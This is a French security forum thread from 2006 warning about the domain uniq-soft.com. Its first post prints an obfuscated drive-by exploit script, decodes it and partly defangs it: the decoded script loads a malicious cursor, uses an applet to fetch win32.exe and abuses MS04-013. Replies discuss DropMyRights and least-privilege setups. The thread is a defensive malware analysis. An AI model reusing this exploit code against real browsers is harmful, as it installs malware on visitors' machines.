Alerte publique de sécurité - uniq-soft.com

Sécurité et insécurité. Virus, Trojans, Spywares, Failles etc. …

Modérateur: Modérateurs et Modératrices

Règles du forum
Assiste.com a suspendu l'assistance à la décontamination après presque 15 ans sur l'ancien forum puis celui-ci. Voir :

Procédure de décontamination 1 - Anti-malware
Décontamination anti-malwares

Procédure de décontamination 2 - Anti-malware et antivirus (La Manip)
La Manip - Procédure standard de décontamination

Entretien périodique d'un PC sous Windows
Entretien périodique d'un PC sous Windows

Protection des navigateurs, de la navigation et de la vie privée
Protéger le navigateur, la navigation et la vie privée

Alerte publique de sécurité - uniq-soft.com

Messagede pierre » 01 Sep 2006, 02:36

Bonjour,

Veuillez bloquer immédiatement ce domaine, uniq-soft.com, dans hosts et / ou bloquer son serveur 81.177.26.26

Ce domaine sert de ressource à des milliers de sites piégés exploitant une faille iFrame

Des domaines crapuleux proposent à des webmasters de piéger leurs sites contre rémunération (61$ les 1000 machines corrompues).

Code: Tout sélectionner
[b]Meta description :[/b] Partnership program. We buy iframe traffic. $61/1000 unique installs or it's up to 15$ per 1000 unique visitors. Weekly payments. Payment by Fethard, Webmoney, E-Gold, Wire

[b]Meta Keywords:[/b] traffic purchase iframe trafic traff traf adult webmaster partnership affiliate program afiliate exploit fethard fet webmoney wm i-frame money dollars purchase traffic trade buy toolbar dialer homepage unique visitors $ installs refferal system referral


Ces domaines crapuleux sont, par exemple :
iframedollars.com (semble arrêté actuellement)
iframedollars.biz (semble arrêté actuellement)
Iframecash.biz (fonctionne sept 2006)

Les sites piégés le sont par introduction d'un simple code d'un iframe invisible. Juste cette ligne, c'est tout.

Code: Tout sélectionner
<iframe src="h__p://zhmbscwdgk.biz/dl/advnnn.php" width=1 height=1></iframe>

nnn est un nombre qui semble être l'identification de l'affilié et le domaine zhmbscwdgk.biz appartient, avec une dizaine d'autres, au groupe crapuleux Iframecash.biz

Un script est alors chargé dans l'iFrame, avec exécution automatique et invisible, depuis un troisième domaine, uniq-soft.com, qui lui semble servir de centre de ressources à tous ces criminels.

NE VOUS AMUSEZ PAS AVEC CE QUI SUIT !

Le script reçu depuis uniq-soft.com
J'ai introduit des coupures dans les lignes pour une meilleure "lisibilité" :D (façon de parler)

Code: Tout sélectionner
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<NOSCRIPT>This page uses Javascript</NOSCRIPT>
<SCRIPT LANGUAGE="javascript" TYPE="text/javascript">
document.write(unescape("%3c%68%74%6d%6c%3e%3c%68%65%61%64%3e%3c%74%69%74%6c%65%3e
%3c%2f%74%69%74%6c%65%3e%3c%2f%68%65%61%64%3e%3c%62%6f%64%79%3e"));
document.write(unescape("%0d%0a%0d%0a%3c%73%74%79%6c%65%3e%0d%0a%2a%20%7b%43%55%52
%53%4f%52%3a%20%75%72%6c%28%22%68%74%74%70%3a%2f%2f%75%6e%69%71"));
document.write(unescape("%2d%73%6f%66%74%2e%63%6f%6d%2f%61%64%76%2f%30%33%32%2f%73
%70%6c%6f%69%74%2e%61%6e%72%22%29%7d%0d%0a%3c%2f%73%74%79%6c%65"));
document.write(unescape("%3e%0d%0a%0d%0a%3c%41%50%50%4c%45%54%20%41%52%43%48%49%56
%45%3d%22%63%6f%75%6e%74%2e%6a%61%72%22%20%43%4f%44%45%3d%22%42"));
document.write(unescape("%6c%61%63%6b%42%6f%78%2e%63%6c%61%73%73%22%20%57%49%44%54
%48%3d%31%20%48%45%49%47%48%54%3d%31%3e%0d%0a%3c%50%41%52%41%4d"));
document.write(unescape("%20%4e%41%4d%45%3d%22%75%72%6c%22%20%56%41%4c%55%45%3d%22
%68%74%74%70%3a%2f%2f%75%6e%69%71%2d%73%6f%66%74%2e%63%6f%6d%2f"));
document.write(unescape("%61%64%76%2f%30%33%32%2f%77%69%6e%33%32%2e%65%78%65%22%3e
%3c%2f%41%50%50%4c%45%54%3e%0d%0a%0d%0a%3c%73%63%72%69%70%74%3e"));
document.write(unescape("%0d%0a%74%72%79%7b%0d%0a%64%6f%63%75%6d%65%6e%74%2e%77%72
%69%74%65%28%27%3c%6f%62%6a%65%63%74%20%64%61%74%61%3d%60%26%23"));
document.write(unescape("%31%30%39%26%23%31%31%35%26%23%34%35%26%23%31%30%35%26%23
%31%31%36%26%23%31%31%35%26%23%35%38%26%23%31%30%39%26%23%31%30"));
document.write(unescape("%34%26%23%31%31%36%26%23%31%30%39%26%23%31%30%38%26%23%35
%38%26%23%31%30%32%26%23%31%30%35%26%23%31%30%38%26%23%31%30%31"));
document.write(unescape("%26%23%35%38%26%23%34%37%26%23%34%37%26%23%36%37%26%23%35
%38%26%23%39%32%26%23%31%30%32%26%23%31%31%31%26%23%31%31%31%26"));
document.write(unescape("%23%31%31%31%3b%2e%6d%68%74%21%27%2b%27%68%74%74%70%3a%2f
%2f%75%6e%69%71%2d%73%6f%66%74%2e%63%6f%6d%2f%2f%61%64%76%2f%2f"));
document.write(unescape("%30%33%32%2f%2f%74%61%72%67%2e%63%68%27%2b%27%6d%3a%3a%2f
%74%61%72%67%27%2b%27%65%74%2e%68%74%6d%60%20%74%79%70%65%3d%60"));
document.write(unescape("%74%65%78%74%2f%78%2d%73%63%72%69%70%74%6c%65%74%60%3e%3c
%2f%6f%27%2b%27%62%27%2b%27%6a%65%27%2b%27%63%74%3e%27%29%3b%0d"));
document.write(unescape("%0a%7d%63%61%74%63%68%28%65%29%7b%7d%0d%0a%3c%2f%73%63%72
%69%70%74%3e%0d%0a%0d%0a%3c%2f%62%6f%64%79%3e%3c%2f%68%74%6d%6c"));
document.write(unescape("%3e"));
</SCRIPT>


Traduction - Phase 1
Nous utiliserons le Transcodeur UTF8 > échappement% > UTF8 que l'on trouve à
http://assiste.com.free.fr/p/code_decod ... echapp.php

Code: Tout sélectionner
<html><head><title></title></head><body>
<style>
* {CURSOR: url("h__p://uniq-soft.com/adv/032/sploit.anr")}
</style>
<APPLET ARCHIVE="count.jar" CODE="BlackBox.class" WIDTH=1 HEIGHT=1>
<PARAM NAME="url" VALUE="h__p://uniq-soft.com/adv/032/win32.exe"></APPLET>
<script>
try{
document.write('<object data=`&#109&#115&#45&#105&#116&#115&#58&#109&#104&#116&#109&#108&#58-
&#102&#105&#108&#101&#58&#47&#47&#67&#58&#92&#102&#111&#111o.mht!'
+'http://uniq-soft.com//adv//032//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></o'+'b'+'je'+'ct>');
}catch(e){}
</script>
</body></html>


C'est tout de suite beaucoup plus clair, non ?

Traduction phase 2
(J'ai introduit quelques distortions dans le code sinon les antivirus vont hurler).

Code: Tout sélectionner
<html><head><title></title></head><body>
<style>
* {CURSOR: url("h__p://uniq-soft.com/adv/032/sploit.anr")}
</style>
<APPLET ARCHIVE="count.jar" CODE="BlackBox.class" WIDTH=1 HEIGHT=1>
<PARAM NAME="url" VALUE="h__p://uniq-soft.com/adv/032/win32.exe"></APPLET>
<script>
try{
document.write('<object data=`ms - its :mhtml:file://C:\fooo;.mht!'+'h__p://uniq-soft.com//adv//032//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></o'+'b'+'je'+'ct>');
}catch(e){}
</script>
</body></html>


De quoi s'agit-il ?
D'un exploit utilisant une faille de sécurité pour installer un downloader qui sera, dans le cas présent, win32.exe.

Dans ce qui est utilisé et descendu se trouve metasploit.exe
Metasploit Framework est une plate-forme open-source avancée de développements, tests et utilisations de codes d'exploits (recherches et exploitations de failles de sécurité). La version actuelle inclue 18 exploits et 27 charges actives (payloads - parasites). http://www.datastronghold.com/archive/t7687.html et http://www.metasploit.com/. Selon les versions, la taille, après compression, est de plus de 10 MO à près de 20 MO et ne peut donc être analysé par VirusTotal ou par Jotti's VirusScan qui limite la taille des fichiers analysés à 10MO maximum.

La suite de cette éprouvante aventure dans une page à venir sur le site : drive-by download

Cordialement
Image
__________________
Pierre (aka Terdef)
Appel à donation - Le site a besoin de votre aide

Comment je me fais avoir/infecter ? - Protéger navigateur, navigation et vie privée - Bloquer publicité et surveillance sur le Web
Accélérer Windows - Accélérer Internet - Décontamination - Installer Malwarebytes - Forums d'entraide

Il ne sera répondu à aucune demande de dépannage posée en MP (Messagerie Privée). Les demandes doivent être publiques et les réponses doivent profiter au public.
Image
Avatar de l’utilisateur
pierre
 
Messages: 26500
Inscription: 20 Mai 2002, 23:01
Localisation: Ici et maintenant

Messagede pierre » 01 Sep 2006, 12:12

Re,

Le parasite vu ci-dessus tente donc d'exploiter, en septembre 2006, la vulnérabilité (faille de sécurité) corrigée en avril 2004 et décrite dans MS04-013 qui n'affecte pas que OutLook Express comme le laisse croire le bulletin Microsoft. L'exploit vise à exécuter à distance du code sans le consentement de l'utilisateur et avec les mêmes niveaux de privilèges que lui. L'ordinateur est compromis au simple accès sur un site piégé (exécution dans un iFrame) ou au click sur une fenêtre ou un lien trompeur ou lorsqu'un e-mail au format html est ouvert (visualisé). Aucun symptôme apparent ne permet de se rendre compte que l'attaque a été conduite est réussie.

Vous devriez travailler en mode "utilisateur normal" et jamais en "mode administrateur". Si vous êtes contraint et forcé de travailler en mode administrateur, lancez vos applications communicantes avec DropMyRights.

MS04-013
http://www.microsoft.com/france/technet ... 4-013.html

DropMyRights
http://assiste.com.free.fr/p/logitheque ... ights.html

Cordialement
Image
__________________
Pierre (aka Terdef)
Appel à donation - Le site a besoin de votre aide

Comment je me fais avoir/infecter ? - Protéger navigateur, navigation et vie privée - Bloquer publicité et surveillance sur le Web
Accélérer Windows - Accélérer Internet - Décontamination - Installer Malwarebytes - Forums d'entraide

Il ne sera répondu à aucune demande de dépannage posée en MP (Messagerie Privée). Les demandes doivent être publiques et les réponses doivent profiter au public.
Image
Avatar de l’utilisateur
pierre
 
Messages: 26500
Inscription: 20 Mai 2002, 23:01
Localisation: Ici et maintenant

Messagede EyeOfTheTaupe » 08 Sep 2006, 16:43

Hello Pierre,
Suite a ton message, j'ai installé pour test DropMyrights, le petit souci que je rencontre et que suite à la création des raccourcis, le chemin de l'executable n'est plus celui declaré dans les régles de mon FW, du coup plus d'execution (normal), j'ai beaucoup de régles et pas envie de les ré-editées pour leur affecter le bon chemin. Est il possible d'obtenir le même résultat que DMR, soit se retrouver en droit restreint lors de l'utilisation d'IE, en passant par Gpedit.msc ou directement par les droits NTFS sur l'executable?
Merci d'avance.
EyeOfTheTaupe
 
Messages: 10
Inscription: 21 Juil 2006, 11:38

Messagede Jim Rakoto » 08 Sep 2006, 19:39

Salut

Outpost propose seulement d'autoriser DropMyRights à démarrer une application.

En autorisant dropmyrights.exe cela ne marche pas ?

A+
Mes configs Linux user #402189
Garder toujours son sens critique en éveil en utilisant le doute rationnel comme filtre de lecture.
Avatar de l’utilisateur
Jim Rakoto
Modérateur
 
Messages: 6152
Inscription: 09 Mar 2004, 19:49
Localisation: Durbuy

Messagede pierre » 08 Sep 2006, 20:14

Tiens ! Salut EyeOfTheTaupe ! Bienvenue !

Si je me souviens bien, nous nous étions rencontrés à La Ciotat, non ? Lors de ma conférence anti-spam et des ateliers SoSWindows ? Comme le temps passe ! 3 ans déjà ! Comment vas-tu ?

Comme le dit Jim, c'est DropMyRights qui lance les processus, tous les processus. Si ton pare-feu autorise cette application à en lancer d'autres, tu devrais n'avoir à créer qu'une seule règle pour tous les lancements par DMR.

Alors, est-ce que ceci pose un problème ? Oui ! Un processus comme Firefox ou IE devrait, par exemple, être interdit des protocoles de messagerie... etc. ... Mais c'est Jim le spéblurpte OutPost.

Est-ce que le plus simple (et le plus normal) ne serait pas de créer un compte dans le groupe utilisateurs et de travailler avec/sous ce compte car, le mode admin, nous n'en avons jamais besoin, personne n'en a jamais besoin (sauf pour installer un soft ou mettre à jour le système, 15 minutes par mois).

A+
Image
__________________
Pierre (aka Terdef)
Appel à donation - Le site a besoin de votre aide

Comment je me fais avoir/infecter ? - Protéger navigateur, navigation et vie privée - Bloquer publicité et surveillance sur le Web
Accélérer Windows - Accélérer Internet - Décontamination - Installer Malwarebytes - Forums d'entraide

Il ne sera répondu à aucune demande de dépannage posée en MP (Messagerie Privée). Les demandes doivent être publiques et les réponses doivent profiter au public.
Image
Avatar de l’utilisateur
pierre
 
Messages: 26500
Inscription: 20 Mai 2002, 23:01
Localisation: Ici et maintenant

Messagede EyeOfTheTaupe » 09 Sep 2006, 08:38

Jim Rakoto a écrit:Salut

Outpost propose seulement d'autoriser DropMyRights à démarrer une application.

En autorisant dropmyrights.exe cela ne marche pas ?

A+

Slt,
Non ça ne suffit pas. Le souci, est que le chemin de l'exe IE declaré dans les regles OP est, par exemple D:\Program Files\Internet Explorer\iexplore.exe , avec DMR il devient D:\leraccourcis\ D:\Program Files\Internet Explorer\iexplore.exe , et ça apparement ça plait pas a OP. En desactivant OP, evidement tout fonctionne !!
Merci.
EyeOfTheTaupe
 
Messages: 10
Inscription: 21 Juil 2006, 11:38

Messagede EyeOfTheTaupe » 09 Sep 2006, 09:02

pierre a écrit:Tiens ! Salut EyeOfTheTaupe ! Bienvenue !

Si je me souviens bien, nous nous étions rencontrés à La Ciotat, non ? Lors de ma conférence anti-spam et des ateliers SoSWindows ? Comme le temps passe ! 3 ans déjà ! Comment vas-tu ?

Comme le dit Jim, c'est DropMyRights qui lance les processus, tous les processus. Si ton pare-feu autorise cette application à en lancer d'autres, tu devrais n'avoir à créer qu'une seule règle pour tous les lancements par DMR.

Alors, est-ce que ceci pose un problème ? Oui ! Un processus comme Firefox ou IE devrait, par exemple, être interdit des protocoles de messagerie... etc. ... Mais c'est Jim le spéblurpte OutPost.

Est-ce que le plus simple (et le plus normal) ne serait pas de créer un compte dans le groupe utilisateurs et de travailler avec/sous ce compte car, le mode admin, nous n'en avons jamais besoin, personne n'en a jamais besoin (sauf pour installer un soft ou mettre à jour le système, 15 minutes par mois).

A+

Hello Pierre,
Oui c'est bien moi la Taupe de la ciotat :o)) c'était bien sympa ce salon informatique, tu en a fais d'autres depuis ??
Pour mon petit souci, du fait que je "bricole" beaucoup mon XP et teste plein de soft (toujours avec une sauvegarde à portée de main biensûr) , c'est plus pratique pour moi d'être loguer en admin, ce pourquoi la soluce de DMR me semblait pratique.
PS: Pierre rappele moi le nom du gars qui chantait sur le DVD musical qu'on regardait en boucle à la Ciotat, le mentor de Clapton.
Merci. @+
EyeOfTheTaupe
 
Messages: 10
Inscription: 21 Juil 2006, 11:38

Messagede Félix le Chat » 09 Sep 2006, 10:20

Bonjour,

La solution élégante et la plus simple, avec process.exe qui est placé en C:\WINDOWS\system32, on peut aussi utiliser taskill.exe, qui se trouve nativement au même endroit, mais la syntaxe est légérement différente.

Créer un fichier "bureau sûr.bat", par exemple *, ce fichier tue le bureau et le relance avec des droits réduits sans rien changer dans le système, ensuite on peut lancer tous les programmes susceptibles de se connecter à internet à partir du bureau, leur chemin n'est pas modifié, mais ils ont hérités des droits restreints du bureau.

Simple, mais efficace, la suite si demandé, comment garder une fenêtre avec des droits d'aministrateur sur un bureau ayant des droits restreints ?

*

Rem On tue le Bureau
%SystemRoot%\system32\process -k explorer.exe
Rem On relance le tout avec le moins possible de droits
c:\dmr\DropMyRights.exe "c:\windows\explorer.exe "
Avatar de l’utilisateur
Félix le Chat
 
Messages: 824
Inscription: 20 Aoû 2004, 08:29

Messagede Jim Rakoto » 09 Sep 2006, 10:38

Salut

J'utilise une solution un peu différente pour installer DMR
clic droit sur bureau > nouveau > raccourci > parcourir

aller dans le dossier où tu as extrait DMR > sélectionner > ouvrir > une ligne apparaît dans la barre

tu marques un espace avec la barre d'espacement

clic droit sur l'icône Firefox > propriétés > à côté de cible tu vois C:\Program Files\Mozilla Firefox\firefox.exe > tu fais un clic droit > copier

Tu reviens dans le nouveau raccourci > clic droit à côté de l'espace que tu as inséré > coller > OK

Donner un nom à ton raccourci > FF save par ex. > OK

Voilà le nouveau raccourci est créé > clic pour tester

ensuite un clic droit > propriétés > changer icône > un message d'alerte > OK > choisir l'icône que tu préfères.

Sinon l'idée de Félix le chat est ingénieuse. Il pousse plus loin que moi cette utilisation de DMR.

A+
Mes configs Linux user #402189
Garder toujours son sens critique en éveil en utilisant le doute rationnel comme filtre de lecture.
Avatar de l’utilisateur
Jim Rakoto
Modérateur
 
Messages: 6152
Inscription: 09 Mar 2004, 19:49
Localisation: Durbuy

Messagede pierre » 09 Sep 2006, 11:28

Bonjour,

Bien la soluce de Felix - on passe intégralement en utilisateur à droits restreints sous son login admin. Ca me plait beaucoup. C'est simple, élégant...

EyeOfTheTaupe, nous écoutions et regardions le DVD du 70ème anniversaire de John Mayall
John Mayall and the Bluesbreakers - 70th Birthday Concert (2003)
Il passe assez souvent sur ma platine et je travaille dans cette ambiance blues avec Eric Clapton, Chris Barber, Mick Taylor...
Pure moment d'émotions et de souvenir des années 60-70 ! Blues blanc par et avec le maître des plus grands qui sont venus lui rendre homage et l'accompagner dans ce concert qui est absolument à voir et avoir.

John Mayall and the Bluesbreakers - 70th Birthday Concert (2003) - 12,65€ à la FNAC

en 2004, sur ce forum, Pierre a écrit:Pour les petits jeunes qui ne savent pas, les BluesBreakers sont depuis plus de 40 ans un vivier dans lequel nagèrent des inconus élèves de Mayall comme Eric Clapton (qui sortait des YardBirds et juste avant Cream avec Jack Bruce lui aussi un BluesBreakers), Mick Taylor (les Stones), John McVie, Peter Green et Mick Fleetwood (tous les 3 ont créé Fleetwood Mac), John Almond et Jon Mark (Mark-Almond), Steve Thompson (qui a fondé Stone The Crow), Andy Fraser (qui a fondé Free), John Hiseman (qui a fondé Colosseum), Hughie Flint (qui a fondé The Bluesband), Aynsley Dunbar (qui a été le batteur de Frank Zappa et les Mothers of Inventions), Walter Trout, Coco Montoya, James Quillsmith et Harvey Mandel qui volent de leurs propres ailes... et le tromboniste Chris Barber, ainsi que le trompettiste Henry Lowther...

D'autres ne furent pas ses élèves mais jouèrent dans ou avec les Bluesbrakers comme Jimi Hendrix, Andy Fraser, Blue Mitchell, Red Holloway, Larry Taylor, Harvey Mandel, John Lee Hooker, T-Bone Walker, Albert King, Buddy Guy, Junior Wells, Etta James, Sippie Wallace, Sonny Boy Williamson, Billy Gibbons, Jonny Lang, Steve Miller, Billy Preston, Steve Cropper, Otis Rush, Gary Moore (PinkFloyd), Jeff Healey, Reese Wynans, Shannon Curfman, Billy Preston, Otis Rush... -

Il y a actuellement un nommé Buddy Whittington à la guitarre dont la fluidité du jeu est délirante - on reste la bouche ouverte et la langue pendante. Rondouillet, petits doigts boudinés mais un jeu... un jeu!!! et des phrases à la guitarre, des phrases, des phrases... très longues parfois, le bavard, mais d'une exactitude implacable, d'une rondeur de son et d'un feeling époustouflant. J'aime vraiment ce qu'il fait. Il traverse son manche dans les 4 directions l'air de rien et ça court partout. Mayall le considère comme le meilleur guitariste qu'ont eu les Bluesbrakers.

C'est John Mayall qui compose et dirrige tout ce beau monde mais c'est le batteur qui rythme tout et on voit les musiciens toujours se tourner vers lui. 18 ans qu'il est là, lui, là ou certains passent 1 ans à 18 mois chez Mayall.

Du blues dont il s'est gorgé chez Mayall, un journaliste dira de Clapton : "il y a de nombreuses années il fit un emprunt au blues, depuis il ne cesse de rembourser".

Clapton "Unplugged" est aussi une de mes ambiances de travail actuellement ainsi que des balades irlandaises (St Patrick n'oblige pas chez moi).

Moment de concentration en regardant Kagemusha - l'ombre du guerrier (kurosawa).

http://www.johnmayall.com/


C'était un post à Piercoco à http://assiste.forum.free.fr/viewtopic.php?p=3074#3074

Bonne journée à tous
Image
__________________
Pierre (aka Terdef)
Appel à donation - Le site a besoin de votre aide

Comment je me fais avoir/infecter ? - Protéger navigateur, navigation et vie privée - Bloquer publicité et surveillance sur le Web
Accélérer Windows - Accélérer Internet - Décontamination - Installer Malwarebytes - Forums d'entraide

Il ne sera répondu à aucune demande de dépannage posée en MP (Messagerie Privée). Les demandes doivent être publiques et les réponses doivent profiter au public.
Image
Avatar de l’utilisateur
pierre
 
Messages: 26500
Inscription: 20 Mai 2002, 23:01
Localisation: Ici et maintenant

Suivante

Retourner vers Sécurité (Contamination - Décontamination)

Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 15 invités

cron